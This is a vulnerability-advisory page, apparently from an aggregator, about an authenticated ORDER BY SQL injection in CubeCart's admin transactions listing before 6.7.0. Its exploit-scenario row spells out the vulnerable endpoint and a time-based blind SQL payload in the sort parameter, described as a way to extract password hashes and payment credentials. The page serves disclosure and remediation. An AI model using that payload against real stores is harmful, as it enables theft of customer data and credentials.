EUVD-2026-30171Severity by source
AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
CubeCart is an ecommerce software solution. Prior to 6.7.0, the admin orders-transactions listing page (admin.php?_g=orders&node=transactions) builds a raw ORDER BY SQL fragment from the attacker-controlled $_GET['sort'] array without column or direction validation. Both the column key and the direction value flow into the query string as bare SQL tokens, and the framework's sqlSafe() (mysqli escape_string) escapes only quote characters - none of which are required for ORDER BY injection. An authenticated administrator with the minimum CC_PERM_READ permission on orders can execute arbitrary SQL against the store database, including time-based blind extraction of admin password hashes, customer PII, and integrated payment-gateway credentials. This vulnerability is fixed in 6.7.0.
AnalysisAI
SQL injection in CubeCart v6 prior to 6.7.0 allows an authenticated administrator to execute arbitrary SQL against the store database via the unsanitized ORDER BY clause on the admin transactions listing page. The admin.php orders-transactions endpoint passes attacker-controlled GET parameters directly into a raw SQL fragment, bypassing the platform's sqlSafe() function which only escapes quote characters - none of which are required for ORDER BY injection. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires an authenticated CubeCart administrator account holding at minimum the CC_PERM_READ permission scoped to the orders module - this is the specific access control gate documented in the CVE description. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS score of 4.9 (medium) is well-calibrated for this vulnerability. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has obtained CubeCart administrator credentials - whether through phishing, credential stuffing against the admin login, or insider access - navigates to admin.php?_g=orders&node=transactions and appends a crafted sort parameter such as ?sort[IF(1=1,SLEEP(5),id)]=ASC. The server-side SQL query incorporates this expression without validation, causing the database to delay responses conditionally based on injected logic, enabling time-based blind extraction of the admin_user table (including bcrypt/MD5 password hashes) and payment gateway API keys stored in the database. … |
| Remediation | The primary fix is to upgrade CubeCart to version 6.7.0, which is confirmed as the patched release per the vendor security advisory at https://github.com/cubecart/v6/security/advisories/GHSA-rm2f-rpcq-6w9f. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
Authentication bypass in Discuz! X5.0 releases 20260320 through 20260501 allows unauthenticated remote attackers to acce
Authenticated remote code execution in Discuz! X5.0 releases 20260320 through 20260501 allows administrators to chain a
Unauthenticated PHP Object Injection in the Happyforms WordPress plugin (versions <= 1.26.13) allows remote attackers to
Unauthenticated PHP Object Injection in the Broadcast Live Video WordPress plugin (versions prior to 7.1.3) allows remot
Unauthenticated PHP object injection in the WordPress plugin 'Integration for Keap/Infusionsoft and Contact Form 7, WPFo
Share
External POC / Exploit Code
Leaving vuln.today